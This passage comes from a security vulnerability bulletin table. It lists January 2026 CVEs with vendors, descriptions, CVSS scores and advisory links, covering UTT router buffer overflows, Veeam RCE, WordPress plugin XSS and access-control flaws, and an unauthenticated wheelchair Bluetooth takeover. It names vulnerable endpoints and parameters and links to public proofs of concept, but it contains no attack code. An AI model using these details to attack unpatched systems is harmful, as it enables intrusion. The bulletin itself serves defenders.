| UTT-- 520W | A flaw has been found in UTT 进取 520W 1.7.7-180627. This vulnerability affects the function strcpy of the file /goform/formTaskEdit. Executing a manipulation of the argument selDateType can lead to buffer overflow. The attack can be executed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 8.8 | CVE-2025-15461 | VDB-339497 \| UTT 进取 520W formTaskEdit strcpy buffer overflow VDB-339497 \| CTI Indicators (IOB, IOC, IOA) Submit #725818 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/24.md https://github.com/cymiao1978/cve/blob/main/new/24.md#poc |
| UTT-- 520W | A vulnerability has been found in UTT 进取 520W 1.7.7-180627. This issue affects the function strcpy of the file /goform/ConfigAdvideo. The manipulation of the argument timestart leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-05 | 8.8 | CVE-2025-15462 | VDB-339498 \| UTT 进取 520W ConfigAdvideo strcpy buffer overflow VDB-339498 \| CTI Indicators (IOB, IOC, IOA) Submit #725819 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/cymiao1978/cve/blob/main/new/25.md https://github.com/cymiao1978/cve/blob/main/new/25.md#poc |
| UTT-- 520W | A vulnerability was determined in UTT 进取 520W 1.7.7-180627. The impacted element is the function strcpy of the file /goform/formConfigFastDirectionW. This manipulation of the argument ssid causes buffer overflow. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 8.8 | CVE-2026-0836 | VDB-340436 \| UTT 进取 520W formConfigFastDirectionW strcpy buffer overflow VDB-340436 \| CTI Indicators (IOB, IOC, IOA) Submit #729018 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/Lena-lyy/cve/blob/main/1223/26.md |
| UTT-- 520W | A vulnerability was identified in UTT 进取 520W 1.7.7-180627. This affects the function strcpy of the file /goform/formFireWall. Such manipulation of the argument GroupName leads to buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 8.8 | CVE-2026-0837 | VDB-340437 \| UTT 进取 520W formFireWall strcpy buffer overflow VDB-340437 \| CTI Indicators (IOB, IOC, IOA) Submit #729019 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/Lena-lyy/cve/blob/main/1223/27.md |
| UTT-- 520W | A security flaw has been discovered in UTT 进取 520W 1.7.7-180627. This impacts the function strcpy of the file /goform/ConfigWirelessBase. Performing a manipulation of the argument ssid results in buffer overflow. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 8.8 | CVE-2026-0838 | VDB-340438 \| UTT 进取 520W ConfigWirelessBase strcpy buffer overflow VDB-340438 \| CTI Indicators (IOB, IOC, IOA) Submit #729020 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/Lena-lyy/cve/blob/main/1223/28.md |
| UTT-- 520W | A weakness has been identified in UTT 进取 520W 1.7.7-180627. Affected is the function strcpy of the file /goform/APSecurity. Executing a manipulation of the argument wepkey1 can lead to buffer overflow. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 8.8 | CVE-2026-0839 | VDB-340439 \| UTT 进取 520W APSecurity strcpy buffer overflow VDB-340439 \| CTI Indicators (IOB, IOC, IOA) Submit #729028 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/GUOTINGTING2297/cve/blob/main/1234/29.md |
| UTT-- 520W | A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. Affected by this vulnerability is the function strcpy of the file /goform/formConfigNoticeConfig. The manipulation of the argument timestart leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 8.8 | CVE-2026-0840 | VDB-340440 \| UTT 进取 520W formConfigNoticeConfig strcpy buffer overflow VDB-340440 \| CTI Indicators (IOB, IOC, IOA) Submit #729029 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/GUOTINGTING2297/cve/blob/main/1234/30.md |
| UTT-- 520W | A vulnerability was detected in UTT 进取 520W 1.7.7-180627. Affected by this issue is the function strcpy of the file /goform/formPictureUrl. The manipulation of the argument importpictureurl results in buffer overflow. It is possible to launch the attack remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-11 | 8.8 | CVE-2026-0841 | VDB-340441 \| UTT 进取 520W formPictureUrl strcpy buffer overflow VDB-340441 \| CTI Indicators (IOB, IOC, IOA) Submit #729030 \| UTT 进取 520W v3v1.7.7-180627 Buffer Overflow https://github.com/GUOTINGTING2297/cve/blob/main/1234/31.md |
| Veeam--Backup And Recovery | This vulnerability allows a Backup or Tape Operator to perform remote code execution (RCE) as root by creating a malicious backup configuration file. | 2026-01-08 | 7.8 | CVE-2025-55125 | https://www.veeam.com/kb4792 |
| Veeam--Backup and Recovery | This vulnerability allows a Backup Administrator to perform remote code execution (RCE) as the postgres user by sending a malicious password parameter. | 2026-01-08 | 9 | CVE-2025-59468 | https://www.veeam.com/kb4792 |
| Veeam--Backup and Recovery | This vulnerability allows a Backup or Tape Operator to write files as root. | 2026-01-08 | 9 | CVE-2025-59469 | https://www.veeam.com/kb4792 |
| Veeam--Backup and Recovery | This vulnerability allows a Backup Operator to perform remote code execution (RCE) as the postgres user by sending a malicious interval or order parameter. | 2026-01-08 | 9 | CVE-2025-59470 | https://www.veeam.com/kb4792 |
| vega--vega | Vega is a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs. Prior to versions 6.1.2 and 5.6.3, applications meeting two conditions are at risk of arbitrary JavaScript code execution, even if "safe mode" expressionInterpreter is used. First, they use `vega` in an application that attaches both the `vega` library and a `vega.View` instance to the global `window` (as the Vega Editor does), or has any other satisfactory function gadgets in the global scope. Second, they allow user-defined Vega `JSON` definitions (as opposed to JSON that is only provided through source code). This vulnerability allows for DOM XSS, potentially stored, potentially reflected, depending on how the library is being used. The vulnerability requires user interaction with the page to trigger. An attacker can exploit this issue by tricking a user into opening a malicious Vega specification. Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the application's domain. This can lead to theft of sensitive information such as authentication tokens, manipulation of data displayed to the user, or execution of unauthorized actions on behalf of the victim. This exploit compromises confidentiality and integrity of impacted applications. Patched versions are available in `vega-selections@6.1.2` (requires ESM) for Vega v6 and `vega-selections@5.6.3` (no ESM needed) for Vega v5. As a workaround, do not attach `vega` or `vega.View` instances to global variables or the window as the editor used to do. This is a development-only debugging practice that should not be used in any situation where Vega/Vega-Lite definitions can come from untrusted parties. | 2026-01-05 | 8.1 | CVE-2025-65110 | https://github.com/vega/vega/security/advisories/GHSA-829q-m3qg-ph8r |
| vega--vega | vega-functions provides function implementations for the Vega expression language. Prior to version 6.1.1, for sites that allow users to supply untrusted user input, malicious use of an internal function (not part of the public API) could be used to run unintended JavaScript (XSS). This issue is fixed in vega-functions `6.1.1`. There is no workaround besides upgrading. Using `vega.expressionInterpreter` as described in CSP safe mode does not prevent this issue. | 2026-01-05 | 7.2 | CVE-2025-66648 | https://github.com/vega/vega/security/advisories/GHSA-m9rg-mr6g-75gm |
| veronalabs--SlimStat Analytics | The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'notes' and 'resource' parameters in all versions up to, and including, 5.3.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator accesses the Recent Custom Events report. | 2026-01-09 | 7.2 | CVE-2025-15055 | https://www.wordfence.com/threat-intel/vulnerabilities/id/afbfabfc-b923-4fe9-9e8f-0cf159f488db?source=cve https://plugins.trac.wordpress.org/changeset/3429990/wp-slimstat |
| veronalabs--SlimStat Analytics | The SlimStat Analytics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `fh` (fingerprint) parameter in all versions up to, and including, 5.3.3. This is due to insufficient input sanitization and output escaping on the fingerprint value stored in the database. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator views the Real-time Access Log report. | 2026-01-09 | 7.2 | CVE-2025-15057 | https://www.wordfence.com/threat-intel/vulnerabilities/id/90920df9-1362-466b-b14b-4714087f556b?source=cve https://plugins.trac.wordpress.org/changeset/3428488/wp-slimstat |
| Waituk--Entrada | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Waituk Entrada allows SQL Injection. This issue affects Entrada: from n/a through 5.7.7. | 2026-01-05 | 9.3 | CVE-2025-39484 | https://vdp.patchstack.com/database/wordpress/theme/entrada/vulnerability/wordpress-entrada-theme-5-7-7-sql-injection-vulnerability?_s_id=cve |
| webrndexperts--Latest Registered Users | The Latest Registered Users plugin for WordPress is vulnerable to unauthorized user data export in all versions up to, and including, 1.4. This is due to missing authorization and nonce validation in the rnd_handle_form_submit function hooked to both admin_post_my_simple_form and admin_post_nopriv_my_simple_form actions. This makes it possible for unauthenticated attackers to export complete user details (excluding passwords and sensitive tokens) in CSV format via the 'action' parameter. | 2026-01-07 | 7.5 | CVE-2025-13493 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e6139543-81e3-480a-93a4-1d87b3f3f51e?source=cve https://plugins.trac.wordpress.org/browser/latest-registered-users/trunk/latest-registered-users.php#L246 https://plugins.trac.wordpress.org/browser/latest-registered-users/tags/1.4/latest-registered-users.php#L246 https://plugins.trac.wordpress.org/browser/latest-registered-users/trunk/latest-registered-users.php#L66 |
| WHILL--Model C2 Electric Wheelchair | WHILL Model C2 Electric Wheelchairs and Model F Power Chairs do not enforce authentication for Bluetooth connections. An attacker within range can pair with the device and issue movement commands, override speed restrictions, and manipulate configuration profiles without any credentials or user interaction. | 2026-01-05 | 9.8 | CVE-2025-14346 | https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-364-01 |
| woocommerce--WooCommerce Square | The WooCommerce Square plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.1 via the get_token_by_id function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to expose arbitrary Square "ccof" (credit card on file) values and leverage this value to potentially make fraudulent charges on the target site. | 2026-01-10 | 7.5 | CVE-2025-13457 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c7f4f726-7e53-4397-8d8b-7a574326adc6?source=cve https://plugins.trac.wordpress.org/changeset/3415850/woocommerce-square |
| WPweb--Follow My Blog Post | Missing Authorization vulnerability in WPweb Follow My Blog Post allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Follow My Blog Post: from n/a through 2.4.0. | 2026-01-05 | 7.5 | CVE-2025-68547 | https://vdp.patchstack.com/database/wordpress/plugin/follow-my-blog-post/vulnerability/wordpress-follow-my-blog-post-plugin-2-4-0-arbitrary-content-deletion-vulnerability?_s_id=cve |
| xfinitysoft--Reviewify Review Discounts & Photo/Video Reviews for WooCommerce | The Reviewify plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'send_test_email' AJAX action in all versions up to, and including, 1.0.6. This makes it possible for authenticated attackers, with Contributor-level access and above, to create arbitrary WooCommerce discount coupons, potentially causing financial loss to the store. | 2026-01-07 | 7.5 | CVE-2025-14070 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9db8756a-a177-4d39-b169-dc874cac2b3b?source=cve https://cwe.mitre.org/data/definitions/862.html https://plugins.trac.wordpress.org/browser/review-for-discount/trunk/admin/class-xswcrd-review-discounts-admin.php#L425 https://plugins.trac.wordpress.org/browser/review-for-discount/tags/1.0.6/admin/class-xswcrd-review-discounts-admin.php#L425 |
| xwiki-contrib--macro-fullcalendar | XWiki Full Calendar Macro displays objects from the wiki on the calendar. Prior to version 2.4.5, users with the right to view the Calendar.JSONService page (including guest users) can exploit a SQL injection vulnerability by accessing database info or starting a DoS attack. This issue has been patched in version 2.4.5. | 2026-01-10 | 10 | CVE-2025-65091 | https://github.com/xwiki-contrib/macro-fullcalendar/security/advisories/GHSA-2g22-wg49-fgv5 https://github.com/xwiki-contrib/macro-fullcalendar/commit/5fdcf06a05015786492fda69b4d9dea5460cc994 |
| Yerootech--iDS6 DSSPro Digital Signage System | iDS6 DSSPro Digital Signage System 6.2 contains an improper access control vulnerability that allows authenticated users to elevate privileges through console JavaScript functions. Attackers can create users, modify roles and permissions, and potentially achieve full application takeover by exploiting insecure direct object references. | 2026-01-06 | 8.8 | CVE-2020-36920 | ExploitDB-48992 Archived Yeroo Tech Vendor Homepage Zero Science Lab Disclosure (ZSL-2020-5608) Packet Storm Security Exploit Entry CXSecurity Vulnerability Database Entry IBM X-Force Vulnerability Exchange VulnCheck Advisory: iDS6 DSSPro Digital Signage System 6.2 Privilege Escalation via Access Control |
| yocoadmin--Yoco Payments | The Yoco Payments plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 3.8.8 via the file parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. | 2026-01-07 | 7.5 | CVE-2025-13801 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ad74d5d0-270e-41d3-9596-2f71b05af276?source=cve https://plugins.trac.wordpress.org/browser/yoco-payment-gateway/tags/3.8.8/src/Helpers/Logs.php#L25 https://plugins.trac.wordpress.org/browser/yoco-payment-gateway/tags/3.8.8/src/Helpers/Logs.php#L59 |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. From versions 2.22.0 to 3.4.1, an unsafe implementation in the pushstate event listener used by ui.sub_pages allows an attacker to manipulate the fragment identifier of the URL, which they can do despite being cross-site, using an iframe. This issue has been patched in version 3.5.0. | 2026-01-08 | 7.2 | CVE-2026-21873 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-mhpg-c27v-6mxr https://github.com/zauberzeug/nicegui/releases/tag/v3.5.0 |
| Zenitel--ICX500 | Remote Code Execution vulnerability that allows unauthenticated attackers to inject arbitrary commands into the hostname of the device. | 2026-01-09 | 10 | CVE-2025-64093 | Zenitel Security Advisory |
| Zenitel--ICX500 | This vulnerability allows unauthenticated attackers to inject an SQL request into GET request parameters and directly query the underlying database. | 2026-01-09 | 7.5 | CVE-2025-64092 | Zenitel Security Advisory |
| Zenitel--TCIS-3+ | This vulnerability allows authenticated attackers to execute commands via the hostname of the device. | 2026-01-09 | 10 | CVE-2025-64090 | Zenitel Security Advisory |
| Zenitel--TCIS-3+ | This vulnerability allows authenticated attackers to execute commands via the NTP-configuration of the device. | 2026-01-09 | 8.6 | CVE-2025-64091 | Zenitel Security Advisory |
| Zimbra--Collaboration | Zimbra Collaboration (ZCS) 10 before 10.0.18 and 10.1 before 10.1.13 allows Classic UI stored XSS via Cascading Style Sheets (CSS) @import directives in an HTML e-mail message. | 2026-01-05 | 7.2 | CVE-2025-66376 | https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories https://wiki.zimbra.com/wiki/Security_Center https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.13#Security_Fixes https://wiki.zimbra.com/wiki/Zimbra_Releases/10.0.18#Security_Fixes |
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| aaextensions--AA Block country | The AA Block Country plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.0.1. This is due to the plugin trusting user-supplied headers such as HTTP_X_FORWARDED_FOR to determine the client's IP address without proper validation or considering if the server is behind a trusted proxy. This makes it possible for unauthenticated attackers to bypass IP-based access restrictions by spoofing their IP address via the X-Forwarded-For header. | 2026-01-07 | 5.3 | CVE-2025-13694 | https://www.wordfence.com/threat-intel/vulnerabilities/id/037ac32a-dc2e-4e9f-9318-65dfee1c80e9?source=cve https://plugins.trac.wordpress.org/browser/aa-block-country/trunk/aablockcountry.php#L26 https://plugins.trac.wordpress.org/browser/aa-block-country/tags/1.0.1/aablockcountry.php#L26 |
| ABB--WebPro SNMP Card PowerValue | Improper Check for Unusual or Exceptional Conditions vulnerability in ABB WebPro SNMP Card PowerValue, ABB WebPro SNMP Card PowerValue UL. This issue affects WebPro SNMP Card PowerValue: through 1.1.8.K; WebPro SNMP Card PowerValue UL: through 1.1.8.K. | 2026-01-07 | 6.5 | CVE-2025-4675 | https://search.abb.com/library/Download.aspx?DocumentID=2CRT000009&LanguageCode=en&DocumentPartId=&Action=Launch |
| ABB--WebPro SNMP Card PowerValue | Insufficient Session Expiration vulnerability in ABB WebPro SNMP Card PowerValue, ABB WebPro SNMP Card PowerValue UL. This issue affects WebPro SNMP Card PowerValue: through 1.1.8.K; WebPro SNMP Card PowerValue UL: through 1.1.8.K. | 2026-01-07 | 6.5 | CVE-2025-4677 | https://search.abb.com/library/Download.aspx?DocumentID=2CRT000009&LanguageCode=en&DocumentPartId=&Action=Launch |
| aharonyan--Guest posting / Frontend Posting / Front Editor WP Front User Submit | The Guest posting / Frontend Posting / Front Editor - WP Front User Submit plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '/wp-json/bfe/v1/revert' REST API endpoint in all versions up to, and including, 5.0.0. This makes it possible for unauthenticated attackers to delete arbitrary media attachments. | 2026-01-07 | 5.3 | CVE-2025-13419 | https://www.wordfence.com/threat-intel/vulnerabilities/id/874b3448-df4c-49c4-bf4f-435cf48f6305?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3432207%40front-editor&new=3432207%40front-editor&sfp_email=&sfph_mail= |
| ahecht--AH Shortcodes | The AH Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'column' shortcode attribute in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14109 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0b77243f-f48b-4a94-9d60-bf96dc26fe77?source=cve https://plugins.trac.wordpress.org/browser/ah-shortcodes/trunk/includes/shortcodes.php#L28 https://plugins.trac.wordpress.org/browser/ah-shortcodes/tags/1.0.2/includes/shortcodes.php#L28 |
| airesvsg--ACF to REST API | The ACF to REST API plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.3.4. This is due to insufficient capability checks in the update_item_permissions_check() method, which only verifies that the current user has the edit_posts capability without checking object-specific permissions (e.g., edit_post($id), edit_user($id), manage_options). This makes it possible for authenticated attackers, with Contributor-level access and above, to modify ACF fields on posts they do not own, any user account, comments, taxonomy terms, and even the global options page via the /wp-json/acf/v3/{type}/{id} endpoints, granted they can authenticate to the site. | 2026-01-07 | 4.3 | CVE-2025-12030 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5ab508fa-298c-48c1-8510-f2e0a881675a?source=cve https://plugins.trac.wordpress.org/browser/acf-to-rest-api/tags/3.3.4/v3/lib/endpoints/class-acf-to-rest-api-controller.php#L108 https://plugins.trac.wordpress.org/browser/acf-to-rest-api/tags/3.3.4/v3/lib/endpoints/class-acf-to-rest-api-controller.php#L120 |
| All-Dynamics Software--enlogic:show Digital Signage System | All-Dynamics Software enlogic:show 2.0.2 contains a session fixation vulnerability that allows attackers to set a predefined PHP session identifier during the login process. Attackers can forge HTTP GET requests to welcome.php with a manipulated session token to bypass authentication and potentially execute cross-site request forgery attacks. | 2026-01-06 | 5.3 | CVE-2020-36913 | Zero Science Lab Disclosure (ZSL-2020-5577) Vendor Changelog for Version 2.0.3 Packet Storm Security Exploit Entry IBM X-Force Vulnerability Database Entry VulnCheck Advisory: All-Dynamics Software enlogic:show 2.0.2 Session Fixation Authentication Bypass |
| alobaidi--The Tooltip | The The Tooltip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'the_tooltip' shortcode in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13908 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d2bac05e-ecd0-427b-90a0-6cf78175cd19?source=cve https://plugins.trac.wordpress.org/browser/the-tooltip/trunk/the-tooltip.php#L92 https://plugins.trac.wordpress.org/browser/the-tooltip/tags/1.0.2/the-tooltip.php#L92 |
| Altera--Quartus Prime Pro | Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Pro Installer (SFX) on Windows allows Search Order Hijacking. This issue affects Quartus Prime Pro: from 24.1 through 24.3.1. | 2026-01-06 | 6.7 | CVE-2025-14596 | https://www.altera.com/security/security-advisory/asa-0004 |
| Altera--Quartus Prime Pro | Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Pro on Windows (System Console modules) allows Search Order Hijacking. This issue affects Quartus Prime Pro: from 17.0 through 25.1.1. | 2026-01-06 | 6.7 | CVE-2025-14605 | https://www.altera.com/security/security-advisory/asa-0004 |
| Altera--Quartus Prime Pro | Insecure Temporary File vulnerability in Altera Quartus Prime Pro Installer (SFX) on Windows allows Use of Predictable File Names. This issue affects Quartus Prime Pro: from 24.1 through 25.1.1. | 2026-01-06 | 6.7 | CVE-2025-14612 | https://www.altera.com/security/security-advisory/asa-0004 |
| Altera--Quartus Prime Standard | Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Standard Installer (SFX) on Windows, Altera Quartus Prime Lite Installer (SFX) on Windows allows Search Order Hijacking. This issue affects Quartus Prime Standard: from 23.1 through 24.1; Quartus Prime Lite: from 23.1 through 24.1. | 2026-01-06 | 6.7 | CVE-2025-14599 | https://www.altera.com/security/security-advisory/asa-0005 |
| Altera--Quartus Prime Standard | Insecure Temporary File vulnerability in Altera Quartus Prime Standard Installer (SFX) on Windows, Altera Quartus Prime Lite Installer (SFX) on Windows allows Explore for Predictable Temporary File Names. This issue affects Quartus Prime Standard: from 23.1 through 24.1; Quartus Prime Lite: from 23.1 through 24.1. | 2026-01-06 | 6.7 | CVE-2025-14614 | https://www.altera.com/security/security-advisory/asa-0005 |
| Altera--Quartus Prime Standard | Uncontrolled Search Path Element vulnerability in Altera Quartus Prime Standard on Windows (Nios II Command Shell modules), Altera Quartus Prime Lite on Windows (Nios II Command Shell modules) allows Search Order Hijacking. This issue affects Quartus Prime Standard: from 19.1 through 24.1; Quartus Prime Lite: from 19.1 through 24.1. | 2026-01-06 | 6.7 | CVE-2025-14625 | https://www.altera.com/security/security-advisory/asa-0005 |
| ameliabooking--Booking for Appointments and Events Calendar Amelia | The Booking for Appointments and Events Calendar - Amelia plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on multiple AJAX actions in all versions up to, and including, 1.2.38. This makes it possible for unauthenticated attackers to mark payments as refunded, trigger sending of queued notifications (emails/SMS/WhatsApp), and access debug information among other things. | 2026-01-09 | 5.3 | CVE-2025-14720 | https://www.wordfence.com/threat-intel/vulnerabilities/id/771ed385-587c-400f-89c6-1a827c3e2c79?source=cve https://plugins.trac.wordpress.org/changeset/3429650/ameliabooking/trunk/src/Application/Commands/Square/SquareRefundWebhookCommandHandler.php |
| amirshk--Autogen Headers Menu | The Autogen Headers Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'head_class' parameter of the 'autogen_menu' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13704 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a63bf106-78cf-441b-a1b3-77ec1cf6c22b?source=cve https://plugins.trac.wordpress.org/browser/autogen-headers-menu/trunk/index.php#L115 https://plugins.trac.wordpress.org/browser/autogen-headers-menu/tags/1.0.1/index.php#L115 https://plugins.trac.wordpress.org/browser/autogen-headers-menu/trunk/index.php#L53 https://plugins.trac.wordpress.org/browser/autogen-headers-menu/tags/1.0.1/index.php#L53 |
| amu02aftab--Client Testimonial Slider | The Client Testimonial Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'aft_testimonial_meta_name' custom field in the Client Information metabox in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the injected administrative page. | 2026-01-09 | 6.4 | CVE-2025-13897 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5bf12608-4e02-4b3a-9363-991dca5ee11b?source=cve https://plugins.trac.wordpress.org/browser/wp-client-testimonial/trunk/wp-client-testimonial.php#L117 https://plugins.trac.wordpress.org/browser/wp-client-testimonial/tags/2.0/wp-client-testimonial.php#L117 |
| anand_kumar--Header and Footer Scripts | The Header and Footer Scripts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the _inpost_head_script parameter in all versions up to, and including, 2.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-11453 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d658e087-8cc7-4653-af3c-407b6f73fb7b?source=cve https://plugins.trac.wordpress.org/browser/header-and-footer-scripts/tags/2.2.2/shfs.php#L119 |
| anilankola--Newsletter Email Subscribe | The Newsletter Email Subscribe plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.4. This is due to incorrect nonce validation on the nels_settings_page function. This makes it possible for unauthenticated attackers to update plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-14904 | https://www.wordfence.com/threat-intel/vulnerabilities/id/00dd9a3c-a9f9-4fd2-9c93-0def42cec496?source=cve https://plugins.trac.wordpress.org/browser/newsletter-email-subscribe/tags/2.4/newsletter-email-subscribe.php#L109 |
| anjan011--Simple User Meta Editor | The Simple User Meta Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user meta value field in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-07 | 4.4 | CVE-2025-14888 | https://www.wordfence.com/threat-intel/vulnerabilities/id/37342a62-97cd-43ef-af27-33092e840e67?source=cve https://plugins.trac.wordpress.org/browser/simple-user-meta-editor/tags/1.0.0/includes/templates/editor/index.php#L57 |
| anwerashif--xShare | The xShare plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing nonce validation on the 'xshare_plugin_reset()' function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-13527 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d6006ffe-e2db-477f-8a9f-c0cf0434086b?source=cve https://plugins.trac.wordpress.org/browser/xshare/trunk/index.php#L50 https://plugins.trac.wordpress.org/browser/xshare/tags/1.0.1/index.php#L50 |
| anybodesign--AD Sliding FAQ | The AD Sliding FAQ plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'sliding_faq' shortcode in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14122 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d6c277f4-28e0-4159-a524-6576d72d2059?source=cve https://plugins.trac.wordpress.org/browser/ad-sliding-faq/trunk/any-sliding-faq.php#L205 https://plugins.trac.wordpress.org/browser/ad-sliding-faq/tags/2.4/any-sliding-faq.php#L205 |
| Arista Networks--EOS | On affected platforms running Arista EOS with MACsec configuration, a specially crafted packet can cause the MACsec process to terminate unexpectedly. Continuous receipt of these packets with certain MACsec configurations can cause longer term disruption of dataplane traffic. | 2026-01-06 | 4.3 | CVE-2025-7048 | https://www.arista.com/en/support/advisories-notices/security-advisory/23120-security-advisory-0132 |
| arraytics--Appointment Booking Calendar WP Timetics Booking Plugin | The Appointment Booking and Scheduling Calendar Plugin - WP Timetics plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on the update and register_routes functions in all versions up to, and including, 1.0.36. This makes it possible for unauthenticated attackers to view and modify booking details. | 2026-01-06 | 6.5 | CVE-2025-5919 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d8d50b65-7479-4140-9231-c06c18d8be8f?source=cve https://plugins.trac.wordpress.org/browser/timetics/tags/1.0.36/core/bookings/api-booking.php#L56 https://plugins.trac.wordpress.org/browser/timetics/tags/1.0.36/core/bookings/booking.php#L592 |
